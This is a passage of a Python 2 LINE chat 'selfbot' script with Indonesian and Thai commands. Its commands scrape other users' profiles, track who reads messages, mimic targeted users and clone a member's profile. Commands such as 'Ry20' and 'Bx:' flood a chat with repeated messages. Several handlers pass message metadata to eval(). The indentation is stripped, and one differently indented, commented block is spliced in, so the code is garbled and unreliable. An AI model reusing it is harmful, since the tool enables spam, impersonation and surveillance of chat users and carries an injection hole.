saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
elif "#Friendpict:" in msg.text:
saya = msg.text.replace('#Friendpict:','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithUrl(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Blocklist","บล็อค","Pbann"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═══════รายชื่อ ที่บล็อค═══════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n══════รายชื่อ ที่บล็อค══════\n\nจำนวนที่บล็อค : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#Myginfoall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["#ไอดีกลุ่ม","Myginfogidall"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="════════ไอดี กลุ่ม════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n════════ไอดี กลุ่ม═══════\n\nไอดีกลุ่มรวม : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "1991258ชื่อกลุ่ม" in msg.text:
saya = msg.text.replace('1991258ชื่อกลุ่ม','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Gid" in msg.text:
saya = msg.text.replace('Gid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif msg.text in ["ลิสกลุ่ม","#Meginfoall"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif "แทค" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
summon(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, len(nama)-1):
nm2 += [nama[j]]
summon(msg.to, nm2)
if jml > 200 and jml < 500:
for i in range(0, 99):
nm1 += [nama[i]]
summon(msg.to, nm1)
for j in range(100, 199):
nm2 += [nama[j]]
summon(msg.to, nm2)
for k in range(200, 299):
nm3 += [nama[k]]
summon(msg.to, nm3)
for l in range(300, 399):
nm4 += [nama[l]]
summon(msg.to, nm4)
for m in range(400, len(nama)-1):
nm5 += [nama[m]]
summon(msg.to, nm5)
if jml > 500:
print "Terlalu Banyak Men 500+"
cnt = Message()
cnt.text = "[SELF BOT\n[By.☬ARIFISTIFIK☬]:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
elif "lurk on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "เปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "lurk off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "lurkers" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Lurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif msg.text in ["เปิดอ่าน","R on","ตั้งเวลา"]:
cl.sendText(msg.to,"lurk on")
elif msg.text in ["ปิดอ่าน","R off"]:
cl.sendText(msg.to,"lurk off")
elif msg.text in ["ใครอ่าน","Ry"]:
cl.sendText(msg.to,"lurkers")
elif msg.text in ["Ry20"]:
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"llurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
cl.sendText(msg.to,"lurkers")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist","Heckmic"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "• "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Phetmic " in msg.text:
cmd = msg.text.replace("Phetmic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithUrl(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithUrl(msg.to,wait["pap"])
#==============================================================================#
elif msg.text in ["Sk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki1.sendMessage(msg)
                    elif msg.text.lower() == 'mymid':
                      # Send this account's mid.
                      cl.sendText(msg.to,mid)
                    elif "Timeline: " in msg.text:
                      # Post to the timeline and reply with a link to the new post.
                      tl_text = msg.text.replace("Timeline: ","")
                      cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
                    elif "Myname: " in msg.text:
                      # Change this account's display name (length guard is
                      # effectively unlimited).
                      string = msg.text.replace("Myname: ","")
                      if len(string.decode('utf-8')) <= 10000000000:
                        profile = cl.getProfile()
                        profile.displayName = string
                        cl.updateProfile(profile)
                        cl.sendText(msg.to,"Changed " + string + "")
                    elif "Mybio: " in msg.text:
                      # Change this account's status message (bio).
                      string = msg.text.replace("Mybio: ","")
                      if len(string.decode('utf-8')) <= 10000000000:
                        profile = cl.getProfile()
                        profile.statusMessage = string
                        cl.updateProfile(profile)
                        cl.sendText(msg.to,"Changed " + string)
                    elif msg.text in ["Myname","Mename"]:
                      # Report own display name.
                      h = cl.getContact(mid)
                      cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
                    elif msg.text in ["ตัส","Mey1"]:
                      # Report own status message.
                      h = cl.getContact(mid)
                      cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
                    elif msg.text in ["รูป","Mey2"]:
                      # Own avatar as an image.
                      h = cl.getContact(mid)
                      cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
                    elif msg.text in ["โปรวีดีโอ","Mey3"]:
                      # Own profile media sent as video (same CDN path).
                      h = cl.getContact(mid)
                      cl.sendVideoWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
                    elif msg.text in ["ลิ้งรูป","Mey4"]:
                      # Own avatar URL as text.
                      h = cl.getContact(mid)
                      cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
                    elif msg.text in ["ปก","Mey5"]:
                      # Own cover image.
                      h = cl.getContact(mid)
                      cu = cl.channel.getCover(mid)
                      path = str(cu)
                      cl.sendImageWithUrl(msg.to, path)
                    elif msg.text in ["ลิ้งปก","Mey6"]:
                      # Own cover URL as text.
                      h = cl.getContact(mid)
                      cu = cl.channel.getCover(mid)
                      path = str(cu)
                      cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "#22Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Ph4" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Ph2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "mh2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "pull the picture" in msg.text:
nk0 = msg.text.replace("pull the picture","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "#pictall" in msg.text:
nk0 = msg.text.replace("#pictall","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "เชคหมด" in msg.text:
nk0 = msg.text.replace("เชคหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "Ph3vdo @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3vdo @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Ph3url @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Ph2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Ph2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "เจ้งเตือน" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybb"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==========================================================#
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bx: " in msg.text:
txt = msg.text.replace("Bx: ", "")
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx10: " in msg.text:
txt = msg.text.replace("Tx10: ", "")
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO ENGLISH----\n" + "" + result + "\n------SUKSES-----")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM EN----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
